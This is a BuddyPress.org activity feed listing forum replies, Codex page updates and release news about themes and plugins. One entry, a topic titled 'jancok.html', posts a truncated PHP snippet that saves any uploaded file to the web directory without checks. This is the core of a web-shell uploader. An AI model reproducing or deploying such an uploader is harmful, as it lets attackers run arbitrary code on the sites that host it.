Skip to:
Content
Pages
Categories
Search
Top
Bottom

  • About
  • News
  • Codex
  • Develop
  • Make
  • Forums
  • Download

BuddyPress.org


  • All Members
  • RSS
  • Profile picture of Henry Wright

    Henry Wright replied to the topic Bp Profile Search Incompatibility in the forum How-to & Troubleshooting 9 years, 7 months ago

    Try asking on the BP Profile Search support forum. Support is very good.

    https://wordpress.org/support/plugin/bp-profile-search

  • Profile picture of @mercime

    @mercime wrote a new post on the site BuddyPress.org 9 years, 7 months ago

    BuddyPress 2.7.0 Release Candidate 2 is now available for testing. Please download the 2.7.0-rc2 zip or get a copy via our Subversion repository.

    This is our last chance to find any bugs that slipped through Re […]

  • Profile picture of Merida

    Merida replied to the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago

    Thank you very much! All ok.

  • Profile picture of Hugo Ashmore

    Hugo Ashmore updated the Updating Custom Themes For New Functionality page, on the BuddyPress Codex 9 years, 7 months ago

    This section is your guide to BuddyPress theme updates, by version release.

    From time to time Buddypress creates new functionality that requires templates and markup adjustments, adds new JavaScript scripting […]

  • Profile picture of David Cavins

    David Cavins updated the Template Updates 2.7 page, on the BuddyPress Codex 9 years, 7 months ago

    In BuddyPress 2.7 we introduce some new features that specifically require template adjustment.

    These changes are of importance for theme developers who may have overloaded the templates to the themes directory […]

  • Profile picture of Hugo Ashmore

    Hugo Ashmore updated the Template Updates 2.1 page, on the BuddyPress Codex 9 years, 7 months ago

    BuddyPress 2.1 introduced three new features that specifically require template updates in order that they function.
    @mentions InterfacePassword Strength MeterActivity Show Filters

    @mentions Auto […]

  • Profile picture of Merida

    Merida replied to the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago

    Default I did not have the file bp-custom.php

    I created this file in /home/user/site/wp-content/plugins/bp-custom.php

    And then in the bp-custom.php file (it was empty), add your code.

  • Profile picture of sn315on

    sn315on started the topic jancok.html in the forum Installing BuddyPress 9 years, 7 months ago

    <?php
    if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
    $abod = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $abod);

    echo"<center><b>Done ==>…[Read more]

  • Profile picture of Hugo Ashmore

    Hugo Ashmore updated the Template Updates 2.7 page, on the BuddyPress Codex 9 years, 7 months ago

    In BuddyPress 2.7 we introduce some new features that specifically require template adjustment.

    These changes are of importance for theme developers who may have overloaded the templates to the themes […]

  • Profile picture of Merida

    Merida replied to the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago

    Thanks for the reply. I did everything according to your instructions.
    but when you open the site gives an error
    Parse error: syntax error, unexpected '}', expecting end of file in /home/user..../site/wp-content/plugins/bp-custom.php on line 18

    how to fix? thank you in advance.

  • Profile picture of Merida

    Merida started the topic [Resolved] user page tab with a link to another site in the forum Miscellaneous 9 years, 7 months ago

    Hello. Do not tell me how to add your user page tab with a link to another site?
    screen fastened.
    http://oi67.tinypic.com/snhzsh.jpg
    thank you in advance.

  • Profile picture of Paul Wong-Gibbs

    Paul Wong-Gibbs replied to the topic [Resolved] Allow html in xprofile fields in the forum How-to & Troubleshooting 9 years, 7 months ago

    I would strongly advise AGAINST remove KSES filters. It’s there for your protection.

  • Profile picture of Sagar Gupta

    Sagar Gupta's profile was updated 9 years, 7 months ago

    Sagar Gupta

    @biorevllc

    View Profile
  • Profile picture of @mercime

    @mercime updated the Template Updates 2.7 page, on the BuddyPress Codex 9 years, 7 months ago

    In BuddyPress 2.7 we introduce some new features that specifically require template adjustment.

    These changes are of importance for theme developers who may have overloaded the templates to the themes […]

  • Profile picture of Paul Wong-Gibbs

    Paul Wong-Gibbs replied to the topic Toolbar Bubble in the forum How-to & Troubleshooting 9 years, 7 months ago

    Not via the UI. 🙁 But you can write some code! Add this to your functions.php file in your theme, it should work even if you add it on a newline at the very end of a file:

    remove_action( 'admin_bar_menu', 'bp_members_admin_bar_notifications_menu', 90 );

  • Profile picture of Paul Wong-Gibbs

    Paul Wong-Gibbs replied to the topic How to load specific theme template for all BP pages? in the forum How-to & Troubleshooting 9 years, 7 months ago

    @r083r7 Hi. You’re right that BuddyPress loads page.php as its default page wrapper template. The list near the top of https://codex.buddypress.org/themes/theme-compatibility-1-7/template-hierarchy/ shows the entire template hierarchy. Adding a buddypress.php file to your theme should have it load that template.

    This file should be in the root of…[Read more]

  • Profile picture of Paul Wong-Gibbs

    Paul Wong-Gibbs replied to the topic How to hide / remove the General tab under Settings in the forum How-to & Troubleshooting 9 years, 7 months ago

    I saw the bug report you’ve filed, Dan, but I’ve not had time to look into it.

  • Profile picture of Kishores

    Kishores replied to the topic IS IT POSSIBLE : BuddyPres + Job_Board + Instant_Messenger in the forum Installing BuddyPress 9 years, 7 months ago

    Here is plugin for Job Board.

    BuddyPress Job Manager

    Instant_Messenger: https://shop.opentuteplus.com/downloads/buddypress-instant-messaging/

  • Profile picture of Slava Abakumov

    Slava Abakumov replied to the topic An option to not allow members to post in group in the forum How-to & Troubleshooting 9 years, 7 months ago

    Better to prevent spam users to register at all. There are a lot of plugins, that help with it.
    I use WP-SpamShield successfully on a BuddyPress site.

  • Profile picture of Slava Abakumov

    Slava Abakumov replied to the topic An option to not allow members to post in group in the forum How-to & Troubleshooting 9 years, 7 months ago

    There is not such publicly available plugin.
    But that’s an interesting idea to consider for plugins-dev.

  • Load More

WordPress.org bbPress.org BuddyPress.org Matt Blog RSS

GPL Contact Us Privacy Terms of Service X

Skip to toolbar
    • WordPress.org
      • About WordPress
      • Documentation
      • Support Forums
      • Feedback
      • Developer Trac
      • Developer Blog
    • bbPress.org
      • About bbPress
      • Documentation
      • Support Forums
      • Feedback
      • Developer Trac
      • Developer Blog
    • BuddyPress.org
      • About BuddyPress
      • Documentation
      • Support Forums
      • Feedback
      • Developer Trac
      • Developer Blog
  • Log in
  • Anonymous
    • AnonymousNot Logged In
    • Register
    • Log In